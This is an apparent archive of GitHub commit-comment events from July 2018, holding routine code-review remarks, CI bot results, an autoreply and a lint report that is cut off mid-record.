{"id":"7985391214","type":"CommitCommentEvent","actor":{"login":"dedChar"},"repo":{"name":"Shroompow/DedShroom"},"payload":{"comment":{"id":29755674,"position":32,"line":167,"path":"dedshroom/utils/storage.js","commit_id":"7bd09b5b5ea11f1e17eaa208041d105c62a58e02","created_at":"2018-07-18T20:49:33Z","updated_at":"2018-07-18T20:49:33Z","author_association":"COLLABORATOR","body":"i see"}},"created_at":"2018-07-18T20:49:33Z"}
{"id":"7985391383","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave-intl/bat-go"},"payload":{"comment":{"id":29755675,"position":25,"line":25,"path":"utils/passphrase/passphrase.go","commit_id":"ab0ec7f6a7092cbabbe19e8251c509c1e95281fe","created_at":"2018-07-18T20:49:35Z","updated_at":"2018-07-18T20:49:35Z","author_association":"NONE","body":"> What's the advantage of changing info when deriving a second key versus just reading more bytes from the same hkdf instance? \r\n\r\nthe former seemed to be recommended by the HKDF spec as the way to expand a single HKDF master key into multiple output keys, but i see nothing wrong with the latter security-wise.\r\n\r\nyeah maybe it's a performance thing? like if you need 100 keys and only want the 100th key, you don't have to do 100*N rounds of HMAC just do get the last key.\r\n\r\n"}},"created_at":"2018-07-18T20:49:35Z"}
{"id":"7985391652","type":"CommitCommentEvent","actor":{"login":"polymorphm"},"repo":{"name":"jpakkane/monocoque"},"payload":{"comment":{"id":29755676,"position":4,"line":5,"path":"meson.build","commit_id":"3b4fdff931101c60788753db1c96d5298c545fe4","created_at":"2018-07-18T20:49:39Z","updated_at":"2018-07-18T20:49:39Z","author_association":"NONE","body":"could fix it to find_python() ? your code is sample for embeding cases :-) \r\n\r\nhttps://github.com/mesonbuild/meson/blob/0.47.1/test%20cases/common/117%20custom%20target%20capture/meson.build"}},"created_at":"2018-07-18T20:49:39Z"}
{"id":"7985393006","type":"CommitCommentEvent","actor":{"login":"andrzejmara"},"repo":{"name":"andrzejmara/1_TaskManager"},"payload":{"comment":{"id":29755677,"position":null,"line":null,"path":null,"commit_id":"be4d2a08f8e24de423b2b6b38690ec72817ce6bd","created_at":"2018-07-18T20:49:55Z","updated_at":"2018-07-18T20:49:55Z","author_association":"OWNER","body":"@pwasilewski-netcode"}},"created_at":"2018-07-18T20:49:55Z"}
{"id":"7985396552","type":"CommitCommentEvent","actor":{"login":"mapcat"},"repo":{"name":"TravelMapping/HighwayData"},"payload":{"comment":{"id":29755689,"position":null,"line":null,"path":null,"commit_id":"f2402c8116c824eed613ec1c10db62a6d00191ae","created_at":"2018-07-18T20:50:37Z","updated_at":"2018-07-18T20:50:37Z","author_association":"CONTRIBUTOR","body":"@jteresco , can you reinstate 41stAv as an alt label for 41stAve in the SC703 file? That label was in use. Thanks."}},"created_at":"2018-07-18T20:50:37Z"}
{"id":"7985397864","type":"CommitCommentEvent","actor":{"login":"kirkshoop"},"repo":{"name":"LeeHowes/pushmi"},"payload":{"comment":{"id":29755692,"position":57,"line":201,"path":"include/pushmi/o/async.h","commit_id":"a237a5558345e1f8fda2ceb55e3352a834784abe","created_at":"2018-07-18T20:50:54Z","updated_at":"2018-07-18T20:50:54Z","author_association":"NONE","body":"do you have plans for removing these threads?"}},"created_at":"2018-07-18T20:50:54Z"}
{"id":"7985399367","type":"CommitCommentEvent","actor":{"login":"TheFakeMateo"},"repo":{"name":"TheFakeMateo/RedPlusPlus"},"payload":{"comment":{"id":29755694,"position":null,"line":null,"path":null,"commit_id":"9d54c9203ab8b7ee58a80249a37d75b58b4df56f","created_at":"2018-07-18T20:51:13Z","updated_at":"2018-07-18T20:51:13Z","author_association":"OWNER","body":"TODO: Update leader mugshots to match the sprites used in battle, instead of the placeholder polished crystal faces."}},"created_at":"2018-07-18T20:51:13Z"}
{"id":"7985403917","type":"CommitCommentEvent","actor":{"login":"duplicatibot"},"repo":{"name":"duplicati/duplicati"},"payload":{"comment":{"id":29755705,"position":null,"line":null,"path":null,"commit_id":"c5e25e7c3df1edb49d07ac84ba3eb9876808f005","created_at":"2018-07-18T20:52:05Z","updated_at":"2018-07-18T20:52:05Z","author_association":"NONE","body":"This commit has been mentioned on **Duplicati**. There might be relevant details there:\n\nhttps://forum.duplicati.com/t/2-0-3-7-on-mac-missing-certificates/3858/15\n"}},"created_at":"2018-07-18T20:52:05Z"}
{"id":"7985404043","type":"CommitCommentEvent","actor":{"login":"OzkanAbdullahoglu"},"repo":{"name":"udacity/reactnd-contacts-complete"},"payload":{"comment":{"id":29755706,"position":null,"line":null,"path":null,"commit_id":"f794f553e4937f6b2afaab2acdb14c623d8eb8c1","created_at":"2018-07-18T20:52:07Z","updated_at":"2018-07-18T20:52:07Z","author_association":"NONE","body":"I solved the problem about the compiling errorr , just update versions fixed all . no need to use constructor function , \r\nto update ,in your terminal \r\nnpm i -g npm-check-updates\r\nncu -u --packageFile package.json\r\nnpm install\r\n-----\r\nthat s my final package.json file \r\n\r\n{\r\n  \"name\": \"contacts\",\r\n  \"version\": \"0.1.0\",\r\n  \"private\": true,\r\n  \"dependencies\": {\r\n    \"escape-string-regexp\": \"^1.0.5\",\r\n    \"form-serialize\": \"^0.7.2\",\r\n    \"react\": \"^16.4.1\",\r\n    \"react-dom\": \"^16.4.1\",\r\n    \"react-router-dom\": \"^4.3.1\",\r\n    \"sort-by\": \"^1.2.0\"\r\n  },\r\n  \"devDependencies\": {\r\n    \"react-scripts\": \"1.1.4\"\r\n  },\r\n  \"scripts\": {\r\n    \"start\": \"react-scripts start\",\r\n    \"build\": \"react-scripts build\",\r\n    \"test\": \"react-scripts test --env=jsdom\",\r\n    \"eject\": \"react-scripts eject\"\r\n  }\r\n}\r\n---\r\n"}},"created_at":"2018-07-18T20:52:07Z"}
{"id":"7985412051","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29755727,"position":null,"line":null,"path":null,"commit_id":"3426530b1bd0ede56bccf22d0f9571e0c4762774","created_at":"2018-07-18T20:53:44Z","updated_at":"2018-07-18T20:53:44Z","author_association":"NONE","body":"158988131-Outdoor-air-node-wet-bulb-EMS-override (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1696 of 1696 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3426530b1bd0ede56bccf22d0f9571e0c4762774-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3426530b1bd0ede56bccf22d0f9571e0c4762774-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3426530b1bd0ede56bccf22d0f9571e0c4762774-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-18T20:53:44Z"}
{"id":"7985412330","type":"CommitCommentEvent","actor":{"login":"kevmoo"},"repo":{"name":"dart-lang/sdk"},"payload":{"comment":{"id":29755728,"position":3,"line":3,"path":"pkg/meta/CHANGELOG.md","commit_id":"d533cef4b8fc38bc6c479ff6e692c7336c6ee6bc","created_at":"2018-07-18T20:53:48Z","updated_at":"2018-07-18T20:53:48Z","author_association":"MEMBER","body":"@pq this should go into a new changelog section, right? For 1.1.6?"}},"created_at":"2018-07-18T20:53:48Z"}
{"id":"7985413523","type":"CommitCommentEvent","actor":{"login":"kevmoo"},"repo":{"name":"dart-lang/sdk"},"payload":{"comment":{"id":29755731,"position":null,"line":null,"path":null,"commit_id":"d533cef4b8fc38bc6c479ff6e692c7336c6ee6bc","created_at":"2018-07-18T20:54:02Z","updated_at":"2018-07-18T20:54:02Z","author_association":"MEMBER","body":"@pq can you do a CL to fix the changelog then publish this?"}},"created_at":"2018-07-18T20:54:02Z"}
{"id":"7985415343","type":"CommitCommentEvent","actor":{"login":"nicholasjhorton"},"repo":{"name":"Amherst-Statistics/IPS9inR"},"payload":{"comment":{"id":29755738,"position":null,"line":null,"path":null,"commit_id":"ef302ddc2d7f6acc6377fc00ae8ec1f6a0061dca","created_at":"2018-07-18T20:54:24Z","updated_at":"2018-07-18T20:54:24Z","author_association":"CONTRIBUTOR","body":"Can you please change this file to render to pdf by default?"}},"created_at":"2018-07-18T20:54:24Z"}
{"id":"7985415518","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave-intl/bat-go"},"payload":{"comment":{"id":29755739,"position":25,"line":25,"path":"utils/passphrase/passphrase.go","commit_id":"ab0ec7f6a7092cbabbe19e8251c509c1e95281fe","created_at":"2018-07-18T20:54:27Z","updated_at":"2018-07-18T20:54:27Z","author_association":"NONE","body":"i guess using `info` also lets you generate a new key from the same seed without knowing how many keys have already been generated. \r\n\r\nlike in the future if some application decides to use the sync seed to derive a key for something else, it doesn't necessarily know how many of the HKDF output bytes have already been used for other keys, but it could generate a unique `info` parameter with high confidence. "}},"created_at":"2018-07-18T20:54:27Z"}
{"id":"7985421725","type":"CommitCommentEvent","actor":{"login":"nicholasjhorton"},"repo":{"name":"Amherst-Statistics/IPS9inR"},"payload":{"comment":{"id":29755753,"position":null,"line":null,"path":null,"commit_id":"ef302ddc2d7f6acc6377fc00ae8ec1f6a0061dca","created_at":"2018-07-18T20:55:43Z","updated_at":"2018-07-18T20:55:43Z","author_association":"CONTRIBUTOR","body":"For:\r\n\r\n+t.test(GEPARTS$OptionOn, GEPARTS$OptionOff, var.equal = TRUE, conf.level = 0.90)\r\n+## XX t.test results and use of dollar signs are both not ideal\r\n\r\nplease replace the two $ with a call to:\r\n\r\nwith(GEPARTS, t.test(OptionOn, OptionOff, ...)"}},"created_at":"2018-07-18T20:55:43Z"}
{"id":"7985423665","type":"CommitCommentEvent","actor":{"login":"adavtyan"},"repo":{"name":"adavtyan/awsemmd"},"payload":{"comment":{"id":29755756,"position":null,"line":null,"path":null,"commit_id":"985cfdfedf8643c3d2d794dc28d26078a35cc451","created_at":"2018-07-18T20:56:07Z","updated_at":"2018-07-18T20:56:07Z","author_association":"OWNER","body":"Incorporate changes"}},"created_at":"2018-07-18T20:56:07Z"}
{"id":"7985424225","type":"CommitCommentEvent","actor":{"login":"uncle-tom"},"repo":{"name":"kirivaha/WP-test"},"payload":{"comment":{"id":29755757,"position":4,"line":27,"path":"index.php","commit_id":"f99df344e446dba47f690976b5828b43413729eb","created_at":"2018-07-18T20:56:13Z","updated_at":"2018-07-18T20:56:13Z","author_association":"NONE","body":"Почему убрал? Закрывающий тег </section> должен быть. И get_footer(); тоже должен быть"}},"created_at":"2018-07-18T20:56:13Z"}
{"id":"7985428794","type":"CommitCommentEvent","actor":{"login":"Nickheythatsme"},"repo":{"name":"Nickheythatsme/SentimentAnalysis"},"payload":{"comment":{"id":29755761,"position":null,"line":null,"path":null,"commit_id":"29e6dbc839fa5473ef0a1e7b7ffa768ad56871e6","created_at":"2018-07-18T20:57:11Z","updated_at":"2018-07-18T20:57:11Z","author_association":"OWNER","body":"[0/1] Running tests...\nTest project /u/grout2/Programming/SentimentAnalysis/_debug\n    Start 1: parse_test\n1/3 Test #1: parse_test .......................   Passed    0.02 sec\n    Start 2: btree\n2/3 Test #2: btree ............................   Passed    0.01 sec\n    Start 3: holder\n3/3 Test #3: holder ...........................   Passed    1.39 sec\n\n100% tests passed, 0 tests failed out of 3\n\nTotal Test time (real) =   1.45 sec\n"}},"created_at":"2018-07-18T20:57:11Z"}
{"id":"7985429206","type":"CommitCommentEvent","actor":{"login":"UnknownDuck"},"repo":{"name":"yhdesai/Maker-ToolBox-Website"},"payload":{"comment":{"id":29755762,"position":2,"line":1,"path":"index.html","commit_id":"9a27969dc48c9ecc3368d7e2a8223fe6ae206644","created_at":"2018-07-18T20:57:15Z","updated_at":"2018-07-18T20:57:15Z","author_association":"COLLABORATOR","body":"Only the things mentioned in the description the rest is just the Visual Studio being gay and changing the line endings space"}},"created_at":"2018-07-18T20:57:15Z"}
{"id":"7985429762","type":"CommitCommentEvent","actor":{"login":"nicholasjhorton"},"repo":{"name":"Amherst-Statistics/IPS9inR"},"payload":{"comment":{"id":29755763,"position":null,"line":null,"path":null,"commit_id":"898c408c30f86c50d1d6e7f799340a9bd42c8f47","created_at":"2018-07-18T20:57:22Z","updated_at":"2018-07-18T20:57:22Z","author_association":"CONTRIBUTOR","body":"I'd suggest replacing\r\n\r\n+confint(LAUND_sims, method=c(\"se\", \"perc\"))\r\n\r\nwith two calls (if both se and perc are needed).  This avoids having to introduce the c() function.\r\n"}},"created_at":"2018-07-18T20:57:22Z"}
{"id":"7985429935","type":"CommitCommentEvent","actor":{"login":"tpDBL"},"repo":{"name":"RocketChat/Rocket.Chat"},"payload":{"comment":{"id":29755765,"position":5,"line":6,"path":"packages/rocketchat-ui/client/components/icon.js","commit_id":"ec92ef6367fe067d892447a8b9d471c651a3658d","created_at":"2018-07-18T20:57:24Z","updated_at":"2018-07-18T20:57:24Z","author_association":"CONTRIBUTOR","body":"\n\nIch bin bis 30.07.2018 abwesend.\n\nIhre Nachricht wird nicht weitergeleitet. Ich werde diese nach meiner\nRückkehr bearbeiten.\n\nBei wichtigen Fragen rufen Sie bitte meine Kollegen unter der Durchwahl\n+430 an,\noder schicken Sie eine Mail an support.ibm-notes@dbl-zentrale.com.\n\n\nHinweis: Dies ist eine automatische Antwort auf Ihre Nachricht  \"Re:\n[RocketChat/Rocket.Chat] Fixed svg for older chrome browsers bug #11414\n(ec92ef6)\" gesendet am 18.07.2018 21:58:33.\n\nDiese ist die einzige Benachrichtigung, die Sie empfangen werden, während\ndiese Person abwesend ist.\n\nWir stellen uns vor - in unserem Unternehmensfilm und Social Media  \n"}},"created_at":"2018-07-18T20:57:24Z"}
{"id":"7985436066","type":"CommitCommentEvent","actor":{"login":"FinalL"},"repo":{"name":"FinalL/chili_framework"},"payload":{"comment":{"id":29755779,"position":null,"line":null,"path":null,"commit_id":"ed6e53a6124d4686e6967457c849d16f5623ccb2","created_at":"2018-07-18T20:58:40Z","updated_at":"2018-07-18T20:58:40Z","author_association":"OWNER","body":"Current version is properly ended 😀 "}},"created_at":"2018-07-18T20:58:40Z"}
{"id":"7985443886","type":"CommitCommentEvent","actor":{"login":"AVVS"},"repo":{"name":"luin/ioredis"},"payload":{"comment":{"id":29755796,"position":24,"line":24,"path":"lib/cluster/ConnectionPool.ts","commit_id":"3c7519cf516fab8cab12da804e3a87d49c01a348","created_at":"2018-07-18T21:00:16Z","updated_at":"2018-07-18T21:00:16Z","author_association":"COLLABORATOR","body":"maybe use Map here as we use delete, which makes obj go to dictionary mode? With Maps it should be better"}},"created_at":"2018-07-18T21:00:16Z"}
{"id":"7985444531","type":"CommitCommentEvent","actor":{"login":"jarun"},"repo":{"name":"jarun/Buku"},"payload":{"comment":{"id":29755800,"position":null,"line":null,"path":null,"commit_id":"982db164af4fdf568642c380daff9ac4c97ca2f1","created_at":"2018-07-18T21:00:22Z","updated_at":"2018-07-18T21:00:22Z","author_association":"OWNER","body":"I have taken care of the lint issues at de7a6993e0bf9f6fba4b9717d423550454792e6b."}},"created_at":"2018-07-18T21:00:22Z"}
{"id":"7985444885","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29755801,"position":null,"line":null,"path":null,"commit_id":"4c0c8377324c8b0f2a4d53374425da6f288fcf79","created_at":"2018-07-18T21:00:27Z","updated_at":"2018-07-18T21:00:27Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Allow editing of an existing note](https://trello.com/c/fnOUfg0O/8-allow-editing-of-an-existing-note)"}},"created_at":"2018-07-18T21:00:27Z"}
{"id":"7985449681","type":"CommitCommentEvent","actor":{"login":"jpakkane"},"repo":{"name":"jpakkane/monocoque"},"payload":{"comment":{"id":29755813,"position":4,"line":5,"path":"meson.build","commit_id":"3b4fdff931101c60788753db1c96d5298c545fe4","created_at":"2018-07-18T21:01:25Z","updated_at":"2018-07-18T21:01:25Z","author_association":"OWNER","body":"The behaviour of these should be identical. `find_program` does all the necessary magic to find the executable needed to run the script."}},"created_at":"2018-07-18T21:01:25Z"}
{"id":"7985451773","type":"CommitCommentEvent","actor":{"login":"nerdoftech"},"repo":{"name":"f5devcentral/f5-sphinx-theme"},"payload":{"comment":{"id":29755819,"position":null,"line":null,"path":null,"commit_id":"558f2a56e29574204d025b16de0cb48369588131","created_at":"2018-07-18T21:01:52Z","updated_at":"2018-07-18T21:01:52Z","author_association":"COLLABORATOR","body":"I think this is causing the build failure. Bash is included in the new alpine container."}},"created_at":"2018-07-18T21:01:52Z"}
{"id":"7985457634","type":"CommitCommentEvent","actor":{"login":"hernss"},"repo":{"name":"davidstoneham/SocialSend"},"payload":{"comment":{"id":29755833,"position":null,"line":null,"path":null,"commit_id":"fa765cf03ad5799e99a46af6d79f551d482e1c50","created_at":"2018-07-18T21:03:03Z","updated_at":"2018-07-18T21:03:03Z","author_association":"NONE","body":"excelent @davidstoneham can you write on telegram @hernsss with 3 \"s\" i would like to discuss with you about this upgrade... thanks!!"}},"created_at":"2018-07-18T21:03:03Z"}
{"id":"7985457674","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29755834,"position":null,"line":null,"path":null,"commit_id":"0c970e90d291178509ffd5089281e5d259d03b73","created_at":"2018-07-18T21:03:03Z","updated_at":"2018-07-18T21:03:03Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [rsyncupdat](https://rsyncupdat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/cache-control](https://rsyncupdat-static-docs.pantheonsite.io/docs/cache-control)\n- [/docs/caching-advanced-topics](https://rsyncupdat-static-docs.pantheonsite.io/docs/caching-advanced-topics)\n- [/docs/code](https://rsyncupdat-static-docs.pantheonsite.io/docs/code)\n- [/docs/database-connection-errors](https://rsyncupdat-static-docs.pantheonsite.io/docs/database-connection-errors)\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/0c970e90d291178509ffd5089281e5d259d03b73/scripts/deploy-live.sh)\n"}},"created_at":"2018-07-18T21:03:03Z"}
{"id":"7985457697","type":"CommitCommentEvent","actor":{"login":"AVVS"},"repo":{"name":"luin/ioredis"},"payload":{"comment":{"id":29755835,"position":24,"line":24,"path":"lib/cluster/ConnectionPool.ts","commit_id":"3c7519cf516fab8cab12da804e3a87d49c01a348","created_at":"2018-07-18T21:03:04Z","updated_at":"2018-07-18T21:03:04Z","author_association":"COLLABORATOR","body":"And then later can do .size() instead of Object.keys().length and so on"}},"created_at":"2018-07-18T21:03:04Z"}
{"id":"7985457821","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"laps15/phpmyadmin"},"payload":{"comment":{"id":29755836,"position":null,"line":null,"path":null,"commit_id":"c5c6093c9a23e8c9834a8ff9c2708832d39b5eb9","created_at":"2018-07-18T21:03:05Z","updated_at":"2018-07-18T21:03:05Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: templates/table/relation/common_form.twig"}},"created_at":"2018-07-18T21:03:05Z"}
{"id":"7985459042","type":"CommitCommentEvent","actor":{"login":"spastorino"},"repo":{"name":"spastorino/rust"},"payload":{"comment":{"id":29755839,"position":15,"line":71,"path":"src/librustc_mir/borrow_check/error_reporting.rs","commit_id":"fa80c651ac27151bced89490a109ff1a99b19ce2","created_at":"2018-07-18T21:03:20Z","updated_at":"2018-07-18T21:03:20Z","author_association":"OWNER","body":"Actually the second example is wrong becase the vector owns the err and span_label takes a mutable borrow to it. So you would be pushing a mutable reference to the vector."}},"created_at":"2018-07-18T21:03:20Z"}
{"id":"7985463438","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29755844,"position":null,"line":null,"path":null,"commit_id":"e3dbcc2f9d583fb5c9029187c833c3013e903fe5","created_at":"2018-07-18T21:04:13Z","updated_at":"2018-07-18T21:04:13Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    ^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/e3dbcc2f9d583fb5c9029187c833c3013e903fe5/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", 